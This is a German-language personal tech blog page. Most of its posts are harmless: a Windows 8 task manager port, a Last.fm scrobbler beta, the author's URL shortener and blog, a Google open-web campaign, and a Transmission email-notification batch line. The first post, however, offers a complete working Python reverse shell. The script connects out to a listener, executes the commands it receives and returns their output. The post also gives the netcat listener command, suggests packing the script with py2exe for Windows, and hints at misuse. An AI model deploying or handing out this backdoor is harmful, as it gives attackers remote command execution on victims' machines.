Reverse Shell in Python

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/python
import socket
import subprocess

HOST = '192.168.1.1'    
PORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
while 1:
    data = s.recv(1024)
    proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    stdout_value = proc.stdout.read() + proc.stderr.read()
    s.send(stdout_value)
s.close()

Heute mal ein kurzes Codeschnippsel von mir. Wie unschwer zu erkennen ist, handelt es sich dabei um ein kurzes Pythonskript, das eine Reverse Shell zu einen Remotecomputer aufbaut.
Bevor das Skript eine Verbindung aufbauen kann, muss auf dem Zielrechner eine netcat-Instanz geöffnet werden, ungefähr so:

1
nc -l  -p 443 -v

Soll das Skript unter Windows laufen, muss es mit py2exe gepackt werden.

Wozu das ganze ? Lasst eurer Fantasie einfach freien Lauf ( ¬‿¬)

Windows 8 Taskmanger für Windows 7

Windows 8 Taskmanager

Wer Windows 8 schon mal ausprobiert hat, dem ist vielleicht der neue Taskmanager aufgefallen. Nun gibt es eine funktionierende Version für Windows 7 namens DBCTaskman.

Das Programm hat die selben Funktionen wie sein Vorbild, nur fehlt die Systemintegration, das heißt, man die Software nicht als Standard festlegen. Trotzdem kann man jetzt getrost den alten Taskmanager, der sich seit Jahren nur minimal verändert hat, in Rente schicken.

Download der Software: Link

Einfacher Node.js Express Webserver für Heroku

console

Der ein oder andere war vielleicht schon einmal in dieser Situation: Man programmierte eines Nachts eine einfache, statische Seite und wollte diese unter einer lustigen Domain hosten. Doch was macht man, wenn man keine freien Resourcen auf etwaigen Servern hat oder gar keine vorhanden sind ? Klar, es gibt Freehoster, doch diese sind meist sehr langsam oder pflastern die von Hand designte Seite mit Werbung voll. Oder beides kombiniert. Ausnahmen sind selten, Alternativen eher unbekannt und nicht jeder ist bereit, 3-4€ für gutes Webhosting auszugeben.

Doch dank dem aufkommen von PAAS-Providern gibt es nun eine einfache und zuverlässige Möglichkeit, statische Websiten zu hosten.

Das Prinzip ist ganz einfach. Man schreibt sich auf Basis des Node.js Packages Express einen kleinen Webserver, ungefähr so:

Beta des Last.fm Scrobblers verfügbar

Übersicht

Nach gefühlten 5 Jahren Entwicklung ist nun seit einiger Zeit eine Beta des Audioscrobblers verfügbar. Das Programm wurde grundlegend erneuert, die Seite wurde endlich in das Programm integriert. Das neue Design ist sehr ansprechend, trotzdem werden alle nötigen Information dargestellt. So muss man nicht mehr die Website öffnen, um Kleinigkeiten nachzuschauen. Für mich gibt es dennoch zwei Wehrmutstropfen - Zum einen kann man nicht von der App heraus auf das Profil einens Freundes zugreifen, es wird einfach die entsprechende Seite im Browser geöffnet. Zum anderen ist nun der RAM-Bedarf des Programms gestiegen, bei mir etwa 34MB.

Download der Beta: klick

In eigener Sache - Neuer Blog & eigener URL-Shortener

Heute stelle ich euch zwei neue Seiten vor, die ich innerhalb der letzten 2 Wochen online gestellt habe.

Bei der ersten Seite handelt es sich um meinen eigenen URL-Shortener 5h0r7.com. Funktioniert wie jeder andere Dienst dieser Art auch, einfach langen Link einfügen und schon hat man eine kurze URL. Das Backend wurde in PHP geschrieben, die Website basiert auf Bootstrap. Die URL ist übrigens in l33t geschrieben und liest sich “short”.

 

short

 

Die zweite Seite http://uselessstuff.de ist eine Art Tumblr, nur eben mit Wordpress als Backend. Dort poste ich also hautpsächlich Bilder, Videos & andere mehr oder weniger lustige Sachen.

 

useless

Take Action: Add Your Voice to Keep the Internet

 

Tell the world's governments you support a free and open web at http://www.google.com/takeaction.

Starting December 3rd, the world's governments are meeting behind closed doors at the ITU to discuss the future of the Internet. Some governments want to use this meeting in Dubai to increase censorship and regulate the Internet.

Tell the world's governments you support a free and open web at http://www.google.com/takeaction. Then spread the word with #freeandopen.

It is ours and it is free.
A free and open world
depends on a free and open web.
And a free and open web
depends on me.

Transmission - Email Benachrichtigungen unter Windows

Aufgrund der anstehenden Änderungen von µTorrent habe ich mich dazu entschlossen, nach Jahren einen anderen Torrentclient zu nutzen. Nach einer kurzen Zeit mit Deluge bin ich bei Transmission hängen geblieben. Die Windowsbuild konnte alle Wünsche erfüllen, nur eMail-Benachrichtigungen fehlten mir irgendwie. Nachdem es im Internet kein Skript gab, das das für mich erledigen könnte, hab ich mir einfach eins selber geschireben. Ihr braucht dazu folgendes:

  • sendemail
  • mein Skript :
    1
    2
    3
    
    C:/Pfad zu sendemail -f "sender mail" -t "recipient mail" -u "Transsmision: Download of %TR_TORRENT_NAME% finished" -m "Download of %TR_TORRENT_NAME% has been finished." -s "smtp server" -xu "smtp user" -xp "smtp password"
    
    

Kopiert den Text einfach in eine Batch und ihr seid fast fertig. Unter der Option “Call script when torrent is completed” in Transmission einfach den Pfad zur Batch angeben, der Rest passiert automatisch.

 

Noch ein letzter Hinweis, der Text kann natürlich mit weiteren Variablen angepasst werden:

  • TR_APP_VERSION
  • TR_TIME_LOCALTIME
  • TR_TORRENT_DIR
  • TR_TORRENT_HASH
  • TR_TORRENT_ID
  • TR_TORRENT_NAME
    Eine Zip mit sendemail und der Batch es gibt übrigens im Downloadbereich.